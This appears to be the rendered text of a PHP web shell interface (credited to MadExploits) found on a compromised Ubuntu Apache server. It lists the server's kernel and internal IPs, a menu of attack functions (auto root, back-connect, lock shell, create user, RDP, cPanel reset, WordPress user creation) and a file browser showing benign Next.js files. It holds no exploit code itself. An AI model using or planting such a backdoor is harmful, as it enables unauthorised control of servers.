Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next /
dist /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
_app.d.ts
959
B
-rw-rw-r--
_app.js
1.45
KB
-rw-rw-r--
_app.js.map
590
B
-rw-rw-r--
_document.d.ts
2.69
KB
-rw-rw-r--
_document.js
37.83
KB
-rw-rw-r--
_document.js.map
23.82
KB
-rw-rw-r--
_error.d.ts
610
B
-rw-rw-r--
_error.js
4.19
KB
-rw-rw-r--
_error.js.map
1.81
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _error.d.ts
import React from 'react'; import type { NextPageContext } from '../shared/lib/utils'; export type ErrorProps = { statusCode: number; title?: string; withDarkMode?: boolean; }; declare function _getInitialProps({ res, err, }: NextPageContext): Promise<ErrorProps> | ErrorProps; /** * `Error` component used for handling errors. */ export default class Error<P = {}> extends React.Component<P & ErrorProps> { static displayName: string; static getInitialProps: typeof _getInitialProps; static origGetInitialProps: typeof _getInitialProps; render(): React.JSX.Element; } export {};
Close